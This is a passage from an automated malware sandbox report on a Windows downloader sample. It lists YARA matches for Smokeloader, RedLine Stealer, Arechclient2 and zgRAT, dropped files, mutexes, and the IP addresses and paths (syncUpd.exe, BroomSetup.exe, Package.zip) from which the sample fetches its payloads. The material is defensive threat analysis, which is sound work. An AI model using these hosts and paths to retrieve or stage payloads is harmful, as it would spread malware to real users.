                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB543E01_2_6BB543E0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB723201_2_6BB72320
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BC1C3601_2_6BC1C360
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BC423701_2_6BC42370
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB023701_2_6BB02370
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB963701_2_6BB96370
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BB083401_2_6BB08340
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BC862C01_2_6BC862C0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BBCE2B01_2_6BBCE2B0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BBD22A01_2_6BBD22A0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00B940603_2_00B94060
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00BAF8403_2_00BAF840
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00BB61303_2_00BB6130
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00B921203_2_00B92120
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00BAB1503_2_00BAB150
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00BDCAA03_2_00BDCAA0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00BE9A003_2_00BE9A00
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00BA43903_2_00BA4390
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00BB03903_2_00BB0390
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00BBFC103_2_00BBFC10
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00B9D5703_2_00B9D570
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00BE55503_2_00BE5550
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00B9A6F03_2_00B9A6F0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00BB66F03_2_00BB66F0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00BE96E03_2_00BE96E0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00B937B03_2_00B937B0
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_6C9D4D8F3_2_6C9D4D8F
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_6C9D3D163_2_6C9D3D16
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_6C9E371C3_2_6C9E371C
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_6C94D24D3_2_6C94D24D
                              Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                              Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: String function: 04167A73 appears 43 times
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: String function: 04149F27 appears 48 times
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: String function: 00409CC0 appears 48 times
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: String function: 0042780C appears 43 times
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: String function: 00B91930 appears 76 times
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: String function: 00B91310 appears 36 times
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: String function: 00D19D36 appears 33 times
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: String function: 6C9D4701 appears 65 times
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: String function: 6C9D6320 appears 31 times
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: String function: 00B91900 appears 31 times
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: String function: 00B914F0 appears 60 times
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: String function: 6BC8DAE0 appears 34 times
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: String function: 6BA8CBE8 appears 134 times
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: String function: 6BC809D0 appears 149 times
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: String function: 6BA994D0 appears 90 times
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: String function: 004043B0 appears 316 times
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1168
                              Source: VucRf0jboS.exe, 00000000.00000003.1904722744.0000000005E3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1900960744.0000000005E5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000002.2367036917.0000000004043000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFirezer0 vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1900617495.0000000005E5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000002.2368707088.000000000421E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFirezer0 vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1898323148.0000000005E55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1898323148.0000000005E55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dll vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1896778569.0000000005E5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1898558114.0000000005E44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1900455279.0000000005E55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1901044068.0000000005E94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1896918659.0000000005E3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dll vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \OriginalFileName vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1898289031.0000000005E44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1898289031.0000000005E44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dll vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1897099676.0000000005E5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dll vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1898423297.0000000005E5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1898398751.0000000005E6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dll vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1904258176.0000000005E95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1898943170.0000000005E70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1900617495.0000000005E94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1904125593.0000000005E94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameL vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1896708658.0000000005E40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1905208754.0000000005E3F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1896744021.0000000005E4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1905856604.0000000005E42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1897295642.0000000005E62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dll vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1900867741.0000000005E55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1898670288.0000000005E5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1758649321.0000000005DC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFirezer0 vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000002.2369348636.0000000005DC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameL vs VucRf0jboS.exe
                              Source: VucRf0jboS.exe, 00000000.00000003.1896816236.0000000005E62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
                              Source: VucRf0jboS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 14.2.run.exe.39d686d.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 18.2.MSBuild.exe.900000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                              Source: 6.2.cmd.exe.54c00c8.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                              Source: 3.2.run.exe.3e7ad5b.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 14.2.run.exe.3a1ad5b.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 15.2.cmd.exe.52100c8.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                              Source: 15.2.cmd.exe.4c3b976.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 6.2.cmd.exe.4a80e64.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 3.2.run.exe.3e7a15b.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 6.2.cmd.exe.54c00c8.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                              Source: 15.2.cmd.exe.52100c8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                              Source: 14.2.run.exe.3a1a15b.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 15.2.cmd.exe.4c7f264.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 6.2.cmd.exe.4a3c976.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 15.2.cmd.exe.4c7fe64.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 3.2.run.exe.3e3686d.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 6.2.cmd.exe.4a80264.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                              Source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e900c6ca8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                              Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee882432f.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                              Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54c537d.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                              Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee8848739.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                              Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54e4dad.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                              Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54d47a3.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                              Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee87fd525.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                              Source: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                              Source: 00000001.00000002.2492933650.0000000004054000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                              Source: 00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                              Source: 00000000.00000002.2368576914.00000000041E5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                              Source: C:\Users\user\AppData\Local\Temp\nkho, type: DROPPEDMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                              Source: C:\Users\user\AppData\Local\Temp\ssfwvk, type: DROPPEDMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                              Source: 6.2.cmd.exe.54c00c8.8.raw.unpack, -Module-.csCryptographic APIs: 'CreateDecryptor'
                              Source: 15.2.cmd.exe.52100c8.7.raw.unpack, -Module-.csCryptographic APIs: 'CreateDecryptor'
                              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@27/63@5/8
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeCode function: 1_2_6BAB7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,1_2_6BAB7030
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00BCD660 GetDiskFreeSpaceExW,std::exception::exception,__CxxThrowException@8,3_2_00BCD660
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_041E5BD6 CreateToolhelp32Snapshot,Module32First,0_2_041E5BD6
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCode function: 0_2_0042628B CoInitialize,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,0_2_0042628B
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeCode function: 3_2_00BA8040 LoadResource,LockResource,SizeofResource,3_2_00BA8040
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\e7cbbe5f9b9841e6afa735541f989b8a
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:120:WilError_03
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                              Source: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exeMutant created: \Sessions\1\BaseNamedObjects\8dddf1vvvv
                              Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exeMutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7436
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7516
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeFile created: C:\Users\user\AppData\Local\Temp\u5qk.0.exeJump to behavior
                              Source: Yara matchFile source: 9.0.u5qk.3.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000009.00000000.2186967041.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.2187851077.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: two0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: two0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: two0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.900_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.900_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.900_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: Installed0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: Installed0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.2280_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.2280_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.2280_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.590_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.590_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.2030_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.2030_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /syncUpd.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /syncUpd.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /timeSync.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /timeSync.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.2030_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.590_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /timeSync.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /syncUpd.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: .exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: .exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /1/Package.zip0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /1/Package.zip0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /1/Package.zip0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: .zip0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: .zip0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: \run.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: \run.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.2280_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.2280_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /BroomSetup.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /BroomSetup.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.2280_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /BroomSetup.exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: .exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: .exe0_2_00424A0E
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: @0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.900_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.900_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.900_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: Installed0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: Installed0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.2280_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.2280_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.2280_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.590_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.590_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.2030_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: 185.172.128.2030_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /syncUpd.exe0_2_04164C75
                              Source: C:\Users\user\Desktop\VucRf0jboS.exeCommand line argument: /syncUpd.exe0_2_04164C75
